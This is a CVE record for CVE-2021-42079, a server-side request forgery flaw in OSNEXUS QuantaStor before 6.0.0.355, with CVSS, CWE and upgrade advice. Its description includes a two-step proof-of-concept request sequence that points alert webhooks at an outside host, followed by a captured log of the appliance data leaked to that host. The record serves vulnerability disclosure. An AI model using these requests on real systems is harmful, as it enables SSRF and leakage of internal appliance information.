{"dataType":"CVE_RECORD","dataVersion":"5.1","cveMetadata":{"cveId":"CVE-2021-42079","assignerOrgId":"b87402ff-ae37-4194-9dae-31abdbd6f217","state":"PUBLISHED","assignerShortName":"DIVD","dateReserved":"2021-10-07T17:12:57.677Z","datePublished":"2023-07-10T06:29:48.339Z","dateUpdated":"2025-09-22T06:40:03.059Z"},"containers":{"cna":{"affected":[{"collectionURL":"https://www.osnexus.com/downloads","defaultStatus":"unknown","platforms":["Windows","Linux"],"product":"QuantaStor","vendor":"OSNEXUS","versions":[{"lessThan":"6.0.0.355","status":"affected","version":"0","versionType":"semver"}]}],"credits":[{"lang":"en","type":"finder","value":"Wietse Boonstra (DIVD)"},{"lang":"en","type":"analyst","value":"Frank Breedijk (DIVD)"},{"lang":"en","type":"analyst","value":"Victor Pasman (DIVD)"},{"lang":"en","type":"analyst","value":"Victor Gevers (DIVD)"},{"lang":"en","type":"analyst","value":"Max van der Horst (DIVD)"},{"lang":"en","type":"analyst","value":"Célistine Oosting (DIVD)"}],"descriptions":[{"lang":"en","supportingMedia":[{"base64":false,"type":"text/html","value":"An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.

POC

Step 1: Prepare the SSRF with a request like this:

GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET>
HTTP/1.1\n
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate\n
Accept: */*\nAccept-Language: en\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
\nConnection: close\n
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json\n
Content-Length: 0

Step 2: Trigger this alert with this request

GET /qstorapi/alertRaise?title=test&message=test&severity=1
HTTP/1.1\n
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate\n
Accept: */*\n
Accept-Language: en\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n
Connection: close\n
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json\n
Content-Length: 1

The post request received by <TARGET> looks like this:
{
 \n### Python FLASK stuff ####\n
 'endpoint': 'index',
 \n'method': 'POST',
 \n'cookies': ImmutableMultiDict([]),
 \n### END Python FLASK stuff ####\n
 \n'data': b'{
  \"attachments\": [
   {\n
    \"fallback\": \"[122] test / test.\",\n
    \"color\": \"#aa2222\",\n
    \"title\": \"[122] test\",\n
    \"text\": \"test\",\n
    \"fields\": [  
     {    \n
      \"title\": \"Alert Severity\",\n    
      \"value\": \"CRITICAL\",\n    
      \"short\": false  
     },  {  
      \"title\": \"Appliance\",    
      \"value\": \"quantastor (https://<HOSTNAME>)\",\n    
      \"short\": true  \n
     },  {    \n
      \"title\": \"System / Driver / Kernel Ver\",    \n
      \"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\",    \n
      \"short\": false  \n
     },  {    \n
      \"title\": \"System Startup\",    \n
      \"value\": \"Fri Aug  6 16-02-55 2021\",    \n
      \"short\": true  \n
      },  {    \n
      \"title\": \"SSID\",    \n
      \"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\",    \n
      \"short\": true  \n
     },
    ],\n
    \"footer\": \"QuantaStor Call-home Alert\",\n
    \"footer_icon\": \"https://platform.slack-edge.com/img/default_application_icon.png\",\n
    \"ts\": 1628461774
   }
  ],
  \"mrkdwn\":true
 }',
 #### FLASK REQUEST STUFF #####\n
 'headers': {\n
  'Host': '<redacted>',
  'User-Agent': 'curl/7.58.0',
  'Accept': '*/*',
  'Content-Type': 'application/json',
  'Content-Length': '790'\n
 },
 'args': ImmutableMultiDict([]),
 'form': ImmutableMultiDict([]),
 'remote_addr': '217.103.63.173',
 'path': '/payload/58',
 'whois_ip': 'TNF-AS, NL'
}\n
#### END FLASK REQUEST STUFF #####"}],"value":"An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\n\nPOC\n\nStep 1: Prepare the SSRF with a request like this:\n\nGET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://\nHTTP/1.1\n\nHost: \nAccept-Encoding: gzip, deflate\n\nAccept: */*\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \nContent-Type: application/json\n\nContent-Length: 0\n\nStep 2: Trigger this alert with this request\n\nGET /qstorapi/alertRaise?title=test&message=test&severity=1 \nHTTP/1.1\n\nHost: \nAccept-Encoding: gzip, deflate\n\nAccept: */*\n\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \nContent-Type: application/json\n\nContent-Length: 1\n\nThe post request received by looks like this:\n{\n \n### Python FLASK stuff ####\n\n 'endpoint': 'index', \n \n'method': 'POST', \n \n'cookies': ImmutableMultiDict([]), \n \n### END Python FLASK stuff ####\n\n \n'data': b'{ \n  \"attachments\": [ \n   {\n\n    \"fallback\": \"[122] test / test.\",\n\n    \"color\": \"#aa2222\",\n\n    \"title\": \"[122] test\",\n\n    \"text\": \"test\",\n\n    \"fields\": [   \n     {    \n\n      \"title\": \"Alert Severity\",\n    \n      \"value\": \"CRITICAL\",\n    \n      \"short\": false  \n     },  {   \n      \"title\": \"Appliance\",     \n      \"value\": \"quantastor (https://)\",\n     \n      \"short\": true  \n\n     },  {    \n\n      \"title\": \"System / Driver / Kernel Ver\",    \n\n      \"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\",    \n\n      \"short\": false  \n\n     },  {    \n\n      \"title\": \"System Startup\",    \n\n      \"value\": \"Fri Aug  6 16-02-55 2021\",    \n\n      \"short\": true  \n\n      },  {    \n\n      \"title\": \"SSID\",    \n\n      \"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\",    \n\n      \"short\": true  \n\n     },\n    ],\n\n    \"footer\": \"QuantaStor Call-home Alert\",\n\n    \"footer_icon\": \" https://platform.slack-edge.com/img/default_application_icon.png \",\n\n    \"ts\": 1628461774\n   }\n  ], \n  \"mrkdwn\":true \n }', \n #### FLASK REQUEST STUFF #####\n\n 'headers': {\n\n  'Host': '', \n  'User-Agent': 'curl/7.58.0', \n  'Accept': '*/*', \n  'Content-Type': 'application/json', \n  'Content-Length': '790'\n\n }, \n 'args': ImmutableMultiDict([]), \n 'form': ImmutableMultiDict([]), \n 'remote_addr': '217.103.63.173', \n 'path': '/payload/58', \n 'whois_ip': 'TNF-AS, NL'\n}\n\n#### END FLASK REQUEST STUFF #####"}],"metrics":[{"cvssV3_1":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.2,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","integrityImpact":"NONE","privilegesRequired":"HIGH","scope":"CHANGED","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N","version":"3.1"},"format":"CVSS","scenarios":[{"lang":"en","value":"GENERAL"}]}],"problemTypes":[{"descriptions":[{"cweId":"CWE-918","description":"CWE-918 Server-Side Request Forgery (SSRF)","lang":"en","type":"CWE"}]}],"providerMetadata":{"orgId":"b87402ff-ae37-4194-9dae-31abdbd6f217","shortName":"DIVD","dateUpdated":"2025-09-22T06:40:03.059Z"},"references":[{"tags":["third-party-advisory","technical-description"],"url":"https://www.wbsec.nl/osnexus"},{"tags":["third-party-advisory","exploit","technical-description"],"url":"https://cisrt.divd.nl/DIVD-2021-00020/"},{"tags":["product"],"url":"https://www.osnexus.com/products/software-defined-storage"},{"tags":["third-party-advisory"],"url":"https://csirt.divd.nl/CVE-2021-42079"}],"solutions":[{"lang":"en","supportingMedia":[{"base64":false,"type":"text/html","value":"Upgrade to the latest version of OSNEXUS QuantaStor."}],"value":"Upgrade to the latest version of OSNEXUS QuantaStor."}],"source":{"discovery":"INTERNAL"},"title":"SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355","x_generator":{"engine":"Vulnogram 0.1.0-dev"}},"adp":[{"providerMetadata":{"orgId":"af854a3a-2127-422b-91ae-364da2661108","shortName":"CVE","dateUpdated":"2024-08-04T03:22:25.855Z"},"title":"CVE Program Container","references":[{"url":"https://www.wbsec.nl/osnexus","tags":["third-party-advisory","x_transferred"]},{"url":"https://www.divd.nl/DIVD-2021-00020","tags":["third-party-advisory","x_transferred"]},{"url":"https://www.osnexus.com/products/software-defined-storage","tags":["product","x_transferred"]},{"url":"https://csirt.divd.nl/CVE-2021-42079","tags":["third-party-advisory","x_transferred"]}]},{"metrics":[{"other":{"type":"ssvc","content":{"timestamp":"2024-11-04T20:06:08.530050Z","id":"CVE-2021-42079","options":[{"Exploitation":"none"},{"Automatable":"no"},{"Technical Impact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}}],"title":"CISA ADP Vulnrichment","providerMetadata":{"orgId":"134c704f-9b21-4f2e-91b3-4a467353bcc0","shortName":"CISA-ADP","dateUpdated":"2024-11-04T20:06:17.817Z"}}]}}